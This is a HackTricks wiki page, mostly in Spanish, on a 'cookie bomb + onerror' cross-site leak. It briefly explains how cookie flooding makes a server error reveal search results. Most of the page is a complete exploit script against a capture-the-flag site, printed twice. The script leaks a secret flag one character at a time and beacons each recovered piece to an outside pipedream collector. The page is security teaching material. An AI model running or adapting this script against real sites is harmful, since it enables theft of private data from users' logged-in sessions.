Cookie Bomb + Onerror XS Leak

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

El siguiente script tomado de aquí está explotando una funcionalidad que permite al usuario insertar cualquier cantidad de cookies, y luego cargar un archivo como un script sabiendo que la verdadera respuesta será más grande que la falsa y luego. Si tiene éxito, la respuesta es una redirección con una URL resultante más larga, demasiado grande para que el servidor la maneje, por lo que devuelve un código de estado http de error. Si la búsqueda falla, no sucederá nada porque la URL es corta.

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousConnection Pool by Destination Example NextURL Max Length - Client Side

Last updated 4 months ago

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form> <script> const $ = document.querySelector.bind(document); const sleep = (ms) => new Promise(r => setTimeout(r, ms)); let i = 0; const stuff = async (len=3500) => { let name = Math.random(); $("form").target = name; let w = window.open('', name); $("#f").value = "_".repeat(len); $("#f").name = i++; $("form").submit(); await sleep(100); }; const isError = async (url) => { return new Promise(r => { let script = document.createElement('script'); script.src = url; script.onload = () => r(false); script.onerror = () => r(true); document.head.appendChild(script); }); } const search = (query) => { return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)); }; const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"; const url = "//en4u1nbmyeahu.x.pipedream.net/"; let known = "actf{"; window.onload = async () => { navigator.sendBeacon(url + "?load"); await Promise.all([stuff(), stuff(), stuff(), stuff()]); await stuff(1600); navigator.sendBeacon(url + "?go"); while (true) { for (let c of alphabet) { let query = known + c; if (await search(query)) { navigator.sendBeacon(url, query); known += c; break; } } } }; </script>